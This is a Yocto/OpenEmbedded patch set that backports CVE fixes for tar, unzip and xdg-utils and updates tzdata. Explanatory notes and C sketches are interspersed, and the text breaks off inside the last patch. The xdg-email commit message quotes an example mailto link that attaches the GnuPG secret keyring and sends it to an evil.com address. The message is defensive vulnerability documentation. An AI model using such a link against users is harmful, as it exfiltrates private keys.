+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break. Return the status. Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+ src/list.c | 40 ++++++++++++++++++++++++++++------------
+ 1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ enum read_header_mode mode)
+ {
+ union block *header;
+- union block *header_copy;
+ char *bp;
+ union block *data_block;
+ size_t size, written;
+- union block *next_long_name = 0;
+- union block *next_long_link = 0;
++ union block *next_long_name = NULL;
++ union block *next_long_link = NULL;
+ size_t next_long_name_blocks = 0;
+ size_t next_long_link_blocks = 0;
+-
++ enum read_header status = HEADER_SUCCESS;
++
+ while (1)
+ {
+- enum read_header status;
+-
+ header = find_next_block ();
+ *return_block = header;
+ if (!header)
+- return HEADER_END_OF_FILE;
++ {
++ status = HEADER_END_OF_FILE;
++ break;
++ }
+
+ if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+- return status;
++ break;
+
+ /* Good block. Decode file size and return. */
+
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ {
+ info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+ if (info->stat.st_size < 0)
+- return HEADER_FAILURE;
++ {
++ status = HEADER_FAILURE;
++ break;
++ }
+ }
+
+ if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ || header->header.typeflag == SOLARIS_XHDTYPE)
+ {
+ if (mode == read_header_x_raw)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ else if (header->header.typeflag == GNUTYPE_LONGNAME
+ || header->header.typeflag == GNUTYPE_LONGLINK)
+ {
++ union block *header_copy;
+ size_t name_size = info->stat.st_size;
+ size_t n = name_size % BLOCKSIZE;
+ size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ xheader_decode_global (&xhdr);
+ xheader_destroy (&xhdr);
+ if (mode == read_header_x_global)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ }
+
+ /* Loop! */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_name->buffer + BLOCKSIZE;
+ recent_long_name = next_long_name;
+ recent_long_name_blocks = next_long_name_blocks;
++ next_long_name = NULL;
+ }
+ else
+ {
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_link->buffer + BLOCKSIZE;
+ recent_long_link = next_long_link;
+ recent_long_link_blocks = next_long_link_blocks;
++ next_long_link = NULL;
+ }
+ else
+ {
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ }
+ assign_string (&info->link_name, name);
+
+- return HEADER_SUCCESS;
++ break;
+ }
+ }
++ free (next_long_name);
++ free (next_long_link);
++ return status;
+ }
+
+ #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+--
+cgit v1.2.1
+
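
Stripped of tar's details, the structure of this fix is the classic "record a status and break; free at the single exit" pattern. A hedged sketch follows; parse_one(), the "L:" record tag and read_all() are all made up for illustration and are not tar's code.

    #include <stdlib.h>
    #include <string.h>

    enum status { OK, FAILED, END };

    /* Parse one record; "L:<name>" records stash a heap-allocated long name. */
    static enum status parse_one(const char *rec, char **long_name)
    {
        if (rec == NULL)
            return END;
        if (strncmp(rec, "L:", 2) == 0) {
            free(*long_name);
            *long_name = strdup(rec + 2);
            return *long_name != NULL ? OK : FAILED;
        }
        return OK;
    }

    static enum status read_all(const char *const *records)
    {
        char *long_name = NULL;
        enum status st = OK;

        for (size_t i = 0; ; i++) {
            st = parse_one(records[i], &long_name);
            if (st != OK)
                break;              /* never 'return' from inside the loop */
        }
        free(long_name);            /* released on every exit path */
        return st;
    }

    int main(void)
    {
        const char *recs[] = { "L:a-very-long-member-name", "plain", NULL };
        return read_all(recs) == END ? 0 : 1;
    }
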
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
new file mode 100644
index 0000000000..b2f40f3e64
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ src/list.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+ where++;
+ }
+ }
+- else if (*where == '\200' /* positive base-256 */
+- || *where == '\377' /* negative base-256 */)
++ else if (where <= lim - 2
++ && (*where == '\200' /* positive base-256 */
++ || *where == '\377' /* negative base-256 */))
+ {
+ /* Parse base-256 output. A nonnegative number N is
+ represented as (256**DIGS)/2 + N; a negative number -N is
+--
+cgit v1.1
+
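
For context, tar header numbers that do not fit the octal text format use base-256: as the patch's code comment notes, a nonnegative value N is stored as (256**DIGS)/2 + N, so the first byte is 0x80 and the remaining bytes hold N, most significant first. The sketch below decodes that common positive case and, like the fix, refuses fields shorter than two bytes; it is a simplified illustration, not tar's from_header().

    #include <stdint.h>
    #include <stdio.h>

    /* Decode a positive base-256 tar numeric field (marker byte 0x80 followed
     * by the value, most significant byte first).  Returns -1 for fields
     * shorter than two bytes, which is the bound the fix enforces before it
     * looks past the marker byte. */
    static int64_t from_base256(const unsigned char *field, size_t len)
    {
        if (len < 2 || field[0] != 0x80)
            return -1;
        int64_t value = 0;
        for (size_t i = 1; i < len; i++)
            value = (value << 8) | field[i];
        return value;
    }

    int main(void)
    {
        unsigned char size_field[12] = { 0x80 };   /* 12-byte "size" field */
        size_field[7] = 0x02;                      /* encodes 2^33 = 8589934592 */
        printf("%lld\n", (long long)from_base256(size_field, sizeof size_field));

        unsigned char truncated[1] = { 0x80 };     /* rejected: only one byte */
        printf("%lld\n", (long long)from_base256(truncated, sizeof truncated));
        return 0;
    }
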
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
new file mode 100644
index 0000000000..f550928540
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xheader.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+ locate_handler (char const *keyword)
+ {
+ struct xhdr_tab const *p;
+-
+ for (p = xhdr_tab; p->keyword; p++)
+ if (p->prefix)
+ {
+- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++ size_t kwlen = strlen (p->keyword);
++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+ return p;
+ }
+ else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+ char const *keyword, char const *arg, size_t size)
+ {
+ char *xstr, *xkey;
+-
++
+ /* copy keyword */
+- size_t klen_raw = strlen (keyword);
+- xkey = alloca (klen_raw + 1);
+- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++ xkey = xstrdup (keyword);
+
+ /* copy value */
+- xstr = alloca (size + 1);
++ xstr = xmalloc (size + 1);
+ memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+
+ xattr_decode_keyword (xkey);
+
+- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++ free (xkey);
++ free (xstr);
+ }
+
+ static void
+--
+cgit v1.1
+
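
The behavioral change in locate_handler() is small enough to show directly: a prefix entry such as "SCHILY.xattr" now only matches when the keyword continues with a dot. A minimal sketch of that comparison follows; prefix_matches() is an illustrative helper, not tar's code.

    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>

    /* Match a pax extended-header keyword against a prefix entry only when the
     * prefix is followed by a '.', not merely a leading substring. */
    static bool prefix_matches(const char *prefix, const char *keyword)
    {
        size_t kwlen = strlen(prefix);
        return strncmp(prefix, keyword, kwlen) == 0 && keyword[kwlen] == '.';
    }

    int main(void)
    {
        printf("%d\n", prefix_matches("SCHILY.xattr", "SCHILY.xattr.user.foo")); /* 1 */
        printf("%d\n", prefix_matches("SCHILY.xattr", "SCHILY.xattrs"));         /* 0 */
        return 0;
    }
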
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb
index ebe6cb0dbd..9297480e85 100644
--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
+PR = "r1"
+
SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
file://musl_dirent.patch \
+ file://CVE-2021-20193.patch \
+ file://CVE-2022-48303.patch \
+ file://CVE-2023-39804.patch \
"
SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
index ec04bfe390..a942ac2991 100644
--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
SUMMARY = "Fake version of the texinfo utility suite"
SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
DEPENDS = ""
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index 5368464f30..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
the history of local time for many representative locations around the globe."
HOMEPAGE = "http://www.iana.org/time-zones"
SECTION = "base"
-LICENSE = "PD & BSD & BSD-3-Clause"
+LICENSE = "PD & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
-PV = "2020d"
+PV = "2024a"
SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
-SRC_URI[tzcode.sha256sum] = "6cf050ba28e8053029d3f32d71341d11a794c6b5dd51a77fc769d6dae364fad5"
-SRC_URI[tzdata.sha256sum] = "8d813957de363387696f05af8a8889afa282ab5016a764c701a20758d39cbaf3"
+SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
+SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
"
# pacificnew
+# "slim" is the default since 2020b
+# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
+ZIC_FMT ?= "slim"
+
do_compile () {
for zone in ${TZONES}; do \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
${S}/${zone} ; \
done
}
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
new file mode 100644
index 0000000000..6ba2b879a3
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+ fileio.c | 5 ++++-
+ process.c | 6 +++++-
+ 2 files changed, 9 insertions(+), 2 deletions(-)
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+ (G.inptr-G.inbuf) + length);
+ } else {
+- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++ if (bytes_read == 0)
+ return PK_EOF;
++ if (bytes_read != length)
++ return PK_ERR;
+ /* Looks like here is where extra fields are read */
+ if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+ {
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+ G.unipath_checksum = makelong(offset + ef_buf);
+ offset += 4;
+
++ if (!G.filename_full) {
++ /* Check if we have a unicode extra section but no filename set */
++ return PK_ERR;
++ }
++
+ /*
+ * Compute 32-bit crc
+ */
+-
+ chksum = crc32(chksum, (uch *)(G.filename_full),
+ strlen(G.filename_full));
+
+--
+2.32.0
+
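
The underlying rule this fix enforces is that a length-prefixed field is only usable if the read actually delivered that many bytes. A hedged, self-contained sketch of the same check with stdio follows; read_exact() and archive.bin are illustrative, not unzip's readbuf() API.

    #include <stdio.h>
    #include <stdlib.h>

    /* Read exactly 'length' bytes into a fresh buffer.  A short read returns
     * NULL instead of handing back a partially filled (and therefore partly
     * uninitialized) buffer. */
    static unsigned char *read_exact(FILE *fp, size_t length)
    {
        unsigned char *buf = malloc(length);
        if (buf == NULL)
            return NULL;
        if (fread(buf, 1, length, fp) != length) {
            free(buf);                  /* declared length not actually present */
            return NULL;
        }
        return buf;
    }

    int main(void)
    {
        FILE *fp = fopen("archive.bin", "rb");      /* hypothetical input file */
        if (fp == NULL)
            return 1;
        size_t declared_len = 32;                   /* e.g. from an extra-field header */
        unsigned char *extra = read_exact(fp, declared_len);
        if (extra == NULL) {
            fclose(fp);
            return 1;                               /* treat as a corrupt archive */
        }
        /* ... parse the extra field ... */
        free(extra);
        fclose(fp);
        return 0;
    }
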
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
new file mode 100644
index 0000000000..1c1e120deb
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+ char buf[9];
+ char *buffer = NULL;
+ char *local_string = NULL;
++ size_t buffer_size;
+
+ for (wsize = 0; wide_string[wsize]; wsize++) ;
+
+ if (max_bytes < MAX_ESCAPE_BYTES)
+ max_bytes = MAX_ESCAPE_BYTES;
+
+- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++ buffer_size = wsize * max_bytes + 1;
++ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+ return NULL;
+ }
+
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+ /* no MB for this wide */
+ /* use escape for wide character */
+ char *escape_string = wide_to_escape_string(wide_string[i]);
+- strcat(buffer, escape_string);
++ size_t buffer_len = strlen(buffer);
++ size_t escape_string_len = strlen(escape_string);
++ if (buffer_len + escape_string_len + 1 > buffer_size)
++ escape_string_len = buffer_size - buffer_len - 1;
++ strncat(buffer, escape_string, escape_string_len);
+ free(escape_string);
+ }
+ }
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
new file mode 100644
index 0000000000..363dafddc9
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ /* convert UTF-8 to local character set */
+ fn = utf8_to_local_string(G.unipath_filename,
+ G.unicode_escape_all);
++ if (fn == NULL)
++ return PK_ERR;
++
+ /* make sure filename is short enough */
+ if (strlen(fn) >= FILNAMSIZ) {
+ fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+ int escape_all;
+ {
+ zwchar *wide = utf8_to_wide_string(utf8_string);
++ if (wide == NULL)
++ return NULL;
+ char *loc = wide_to_local_string(wide, escape_all);
+ free(wide);
+ return loc;
+
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for extracting and viewing files in .zip archives"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
file://CVE-2019-13232_p1.patch \
file://CVE-2019-13232_p2.patch \
file://CVE-2019-13232_p3.patch \
+ file://CVE-2021-4217.patch \
+ file://CVE-2022-0529.patch \
+ file://CVE-2022-0530.patch \
"
UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
+# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
+CVE_CHECK_WHITELIST += "CVE-2008-0888"
+
# exclude version 5.5.2 which triggers a false positive
UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index 1acab2e9e7..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -18,6 +18,10 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/watchdog/watchdog-${PV}.tar.gz \
SRC_URI[md5sum] = "678c32f6f35a0492c9c1b76b4aa88828"
SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c18947c"
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+
UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
@@ -28,6 +32,7 @@ CFLAGS += "-I${STAGING_INCDIR}/tirpc"
LDFLAGS += "-ltirpc"
EXTRA_OECONF += " --disable-nfs "
+CACHED_CONFIGUREVARS += "ac_cv_path_PATH_SENDMAIL=${sbindir}/sendmail"
INITSCRIPT_PACKAGES = "${PN} ${PN}-keepalive"
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..383634ad53
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+ CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ scripts/xdg-email.in | 108 -------------------------------------------
+ 1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+
+ #@xdg-utils-common@
+
+-run_thunderbird()
+-{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+- THUNDERBIRD="$1"
+- MAILTO=$(echo "$2" | sed 's/^mailto://')
+- echo "$MAILTO" | grep -qs "^?"
+- if [ "$?" = "0" ] ; then
+- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+- else
+- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+- fi
+-
+- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
